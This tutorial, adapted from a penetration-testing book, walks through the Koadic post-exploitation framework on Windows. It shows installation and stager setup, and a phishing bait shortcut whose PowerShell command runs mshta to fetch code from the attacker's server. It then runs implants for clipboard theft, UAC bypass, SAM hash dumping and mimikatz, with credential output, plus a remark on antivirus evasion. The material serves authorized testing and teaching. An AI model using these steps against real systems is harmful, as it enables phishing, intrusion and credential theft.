Koadic is a tool for penetration testing or internal vulnerability testing in your own Windows network.
The developers describe it as a command and control post-exploitation rootkit that uses either Windows Script Host, which is a COM-based runtime environment, or VBScript modules for its numerous attacks. It can be used for operating systems from Windows 2000 to Windows 10.
As is common with other postexploitation frameworks, Koadic requires a client-server environment that’s structured in a modular way. Those who have already used Metasploit or Empire will already know the procedure.
Installing the Server
You have two options to install Koadic. If you use the current version of Kali Linux, you can install Koadic directly via sudo apt install koadic. Alternatively, you can use the GitHub repository to install the latest version directly. To do this, you must run the following commands in the Linux terminal:
cd /opt
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
This way, you clone the repository to the /opt/koadic folder and then install the necessary dependencies via the Pip Python package manager.
If everything went through without any problem, a very spartan interface starts, showing the installed version and the number of modules present:
./koadic
~[ Version: 0xB ]~
~[ Stagers: 6 ]~
~[ Implants: 46 ]~
(koadic: sta/js/mshta)#
In the following sections, we assume that you use Koadic on Kali Linux. You need to adjust the sample paths as necessary. First, you should look at the autorun.example file in the Koadic directory. To do this, exit the server using the exit command and call the file with your favorite text editor:
set SRVPORT 9001
set ENDPOINT test123 # this will be the URL: /test123
run
Within this configuration file, important parameters are passed, which are executed at program start. In the example, the server port and the ENDPOINT URL have already been stored. Of course, you must adapt these to your test environment. You can find comprehensive documentation on the project website.
Very important parameters include, for example, CERTPATH and KEYPATH, which are used to include certificates for an encrypted connection between clients and server. You can call this configuration file with the --autorun parameter at Koadic program startup. However, for a first test you can also use the sample file. To do this, copy this file to autorun.cfg, for example, and start the server with the parameters set there:
(koadic: sta/js/mshta)# set SRVPORT 9001
[+] SRVPORT =>; 9001
4
(koadic: sta/js/mshta)# set ENDPOINT test123
[+] ENDPOINT =>; test123
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.171.105:9001/test123
[!] Don't edit this URL! (See: 'help portfwd')
[>;] mshta http://192.168.171.105:9001/test123
(koadic: sta/js/mshta)#
As indicated in the warning, you shouldn’t change the URL now. This is the only way to ensure that clients can reach the server without problems.
Using Helper Tools in the Program
Before we present the other capabilities of Koadic, we want to describe some basic “helper tools” in the program. The help command provides tips everywhere in the environment with regard to which commands are usable in the respective segment. The command line addition via the tab key helps you find your way around the environment and select possible parameters quickly. A simple keystroke lists the available commands in the main directory, for example:
(koadic: sta/js/mshta)# <tab key>
? creds execute help kill options pyexec run sounds use
api domain exit info listeners portfwd quit sessions taco
verbose cmdshell edit exploit jobs load previous repeatjobs
set unset zombies
Creating Connections from a Client to the Server
The way a connection is created from the Windows client to the Koadic server is left to the ingenuity of the respective attacker or penetration tester. The general approach is illustrated by the following scenario; the approach corresponds to a classic spear phishing attack (see figure below):
- The attacker connects to the remote server via SSH.
- The attacker sends an email to the target from a seemingly trusted source.
- The file in the attachment is supposedly a PDF document, but it turns out to be a link file and creates a connection to the Koadic server via the link stored there.
So first you need bait to make the connection. To do this, you want to create an Offer.pdf.lnk file. For this purpose, you use a Windows 10 PC and create a shortcut on the desktop.
In the generated file, you need to adjust the listed fields to the following values:
Target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
“Start-Process mshta http://192.168.171.105:9001/test123“
Start in: %SYSTEMROOT%\system32\WindowsPowershell\v1.0
This will call PowerShell and start a process that connects to the Koadic server. Here, mstha stands for Microsoft HTML application host. The big advantage of this attack is that this file is part of every Windows installation and is signed by Microsoft. It can be used to execute code; in this case, it specifies the network address that was displayed when Koadic was started. This is how the client you are taking over starts.
Give your bait an enticing name. If you want, you can also set a different file icon. However, the selected icon should also be available later in the target system under the same file name; otherwise, it won’t be displayed there.
That’s all there is to it! You can now copy the link files to any target system in your test environment and test whether a connection to the server is established when they’re called.
Virus Protection and Obfuscate: Some antivirus programs have already registered Koadic as malware and included appropriate signatures. The developers are trying to counteract this and have introduced the obfuscate parameter for this purpose, which you may have noticed in the configuration file. Over time, more ways to hide the payload from these programs should be added. In the end, it will become a game of cat and mouse, in which sometimes one side and sometimes the other will gain the upper hand.
Creating a First Connection: Zombie 0
Once you run the link files on the target system, the incoming connection will be displayed as a zombie on the Koadic server. The continuous count starts with zero. The zombies command can then be used to call more information about the source IP address and the status of the connection, so this communication is similar to a session in other frameworks:
[+] Zombie 0: Staging new connection (192.168.171.166)
[+] Zombie 0: WIN10PC\John @ WIN10PC -- Windows 10 Pro
(koadic: sta/js/mshta)# zombies
ID IP STATUS LAST SEEN
--- --------------- ------- -------------------
0 192.168.171.166 Alive 2019-09-13 16:52:12
The Modules of Koadic
As you’ve already seen in the first call of the Koadic server, the modules are divided into stagers and implants. Here, the stagers are primarily used to establish a connection from the client to the server. If no stager is selected, sta/js/mshta is used by default, which is also the most reliable one according to the developers. You can find out which stagers are included by using the listeners command:
koadic: sta/js/mshta)# listeners
ID IP PORT TYPE
---- --------- ----- -------
0 192.168.171.105 9001 stager/js/mshta
If you want to use other stagers, you should specify them in the configuration file at program startup or select them via the use "Stagername" command. Here too, the run command is used to transfer the selection to the server. For example, if you want to use the Windows Management Instrumentation Command Line, you should enable the wmic stager:
koadic: sta/js/mshta)# use stager/js/wmic
(koadic: sta/js/wmic)# run
[+] Spawned a stager at http://192.168.171.105:9996/YH0O8.xsl
[!] Don't edit this URL! (See: 'help portfwd')
[>] wmic os get /FORMAT:"http://192.168.171.105:9996/YH0O8.xsl"
(koadic: sta/js/wmic)# listeners
ID IP PORT TYPE
---- --------- ----- -------
0 192.168.171.105 9001 stager/js/mshta
1 192.168.171.105 9996 stager/js/wmic
Implants are most comparable to the post modules in the Empire framework. They are transferred to the target systems via the existing zombie connections to do their work. In this process, when an implant is executed, the Koadic server creates a work order called a job.
The individual implants are divided into categories that you use in the various stages of postexploitation. Thus, in the directories you will find modules for elevation, gathering, managing, persistence, pivoting, scanning, and other tools.
A brief overview of the various implants can be found on the developers’ GitHub page. However, you can also use the use command and (Tab) to navigate through the menu structure:
(koadic: sta/js/wmic)# use implant/[TAB]
elevate/ fun/ gather/ inject/ manage/ persist/
phish/ pivot/ scan/ util/
(koadic: sta/js/wmic)# use implant/gather/[TAB]
clipboard enum_printers enum_users hashdump_sam
office_key windows_key
enum_domain_info enum_shares hashdump_dc loot_finder
user_hunter
(koadic: sta/js/wmic)# use implant/gather/clipboard
(koadic: imp/gat/clipboard)# info
NAME VALUE REQ DESCRIPTION
----- ---------- ---- -------------
ZOMBIE ALL yes the zombie to target
The info command then lists the necessary parameters for the selected module. In this example, the clipboard is to be read from all target systems. The ALL parameter is set by default. However, you can also select only certain zombie connections using the set command. Using run, you finally execute the selected module:
(koadic: imp/gat/clipboard)# set ZOMBIE 0
[+] ZOMBIE =>; 0
(koadic: imp/gat/clipboard)# run
[*] Zombie 0: Job 1 (implant/gather/clipboard) created.
[+] Zombie 0: Job 1 (implant/gather/clipboard) completed.
Clipboard contents: Secret1234
Extending Rights and Reading Password Hashes
Koadic is an incredibly versatile tool that we can’t describe in detail here. However, we would like to explain the general mode of operation by means of a rights escalation and the reading of password hashes or passwords.
We assume that the file Offer.pdf.lnk was launched on two PCs with user rights. The first PC runs Windows 7, the second Windows 10. Thus, zombie connections 0 and 1 were created on the Koadic server:
(koadic: imp/ele/bypassuac_fodhelper)# zombies
ID IP STATUS LAST SEEN
-- --------------- ------ -------------------
0 192.168.171.166 Alive 2019-09-14 11:05:26
1 192.168.171.230 Alive 2019-09-14 11:05:26
You now want to obtain administrator rights on both computers. For this purpose, Koadic provides various modules in the elevate subdirectory. For Windows 10, you can use implant/elevate/bypassuac_fodhelper and get the necessary parameters with the info command:
koadic: sta/js/mshta) use implant/elevate/bypassuac_fodhelper
(koadic: imp/ele/bypassuac_fodhelper)# info
NAME VALUE REQ DESCRIPTION
PAYLOAD yes run listeners for a list of IDs
ZOMBIE ALL yes the zombie to target
In this context, the term PAYLOAD is a bit confusing. This is the stager ID used for Koadic. You’ve already output the stagers via the listeners command. As a rule, it’s sufficient here to set the value to 0. On the other hand, we do not recommend leaving the parameter for the zombie connection set to ALL; instead, we recommend specifying the applicable ID here in each case.
Once you’ve entered everything using set, you can instruct Koadic to run the module using run. This creates a job and outputs further information. If the attack was successful, another zombie should be displayed. The asterisk (*) after the ID indicates that this connection now has administrator rights.
Now you can proceed in the same way for the Windows 7 PC. However, here you need the implant/elevate/bypassuac_eventvwr module.
With this, you’ll get two new connections:
(koadic: imp/ele/bypassuac_eventvwr)# zombies
ID IP STATUS LAST SEEN
-- --------------- ------ -------------------
0 192.168.171.166 Alive 2019-09-14 11:07:07
1 192.168.171.230 Alive 2019-09-14 11:07:07
2* 192.168.171.166 Alive 2019-09-14 11:07:07
3* 192.168.171.230 Alive 2019-09-14 11:07:07
Now you’ve fulfilled the requirements to read the passwords or hash values in the target systems. Koadic provides the necessary modules in the gather or inject directories.
Use the implant/gather/hashdump_sam module to read password hashes on Windows 10. You can leave the preset parameters and only need to enter the zombie ID. However, make sure that you select the correct connection with administrator rights (2* in the example). Otherwise, the attempt will fail because you do not have sufficient rights.
For Windows 7, you must use the implant/inject/mimikatz_dotnet2js module in the same way. This way, with a little luck, you’ll also obtain the login passwords in plain text. The creds command lists the results:
Cred ID IP USERNAME + DOMAIN
------- --------------- ------------------
0 192.168.171.230 John WIN7CLIENT Secret1234
5 192.168.171.166 WDAGUtilityAccount WIN10PC
6 192.168.171.166 Win10PC WIN10PC
7 192.168.171.166 John WIN10PC
PASSWORD NTLM
-------------------------------
4ceb37c54b65aabf5abd537c6d285123
e3c560b7ff401f8456c69001aa42d979
c02de0449053f00a6df2ff9177f294ca
3ec82c448595c1a415b550e1b0c6ec68
Conclusion and Countermeasures
Koadic is a postexploitation framework that is in the early stages of development, but it already comes with many useful modules. It remains to be seen what tricks the developers can incorporate to make it harder for antivirus programs to find the payloads. Because most of the zombie connections are unwanted connections to the internet, a firewall combined with a proxy server equipped with user authentication helps as a countermeasure.
Editor’s note: This post has been adapted from a section of the book Hacking and Security: The Comprehensive Guide to Penetration Testing and Cybersecurity by Michael Kofler, Klaus Gebeshuber, Peter Kloep, Frank Neugebauer, André Zingsheim, Thomas Hackner, Markus Widl, Roland Aigner, Stefan Kania, Tobias Scheible, and Matthias Wübbeling.
Comments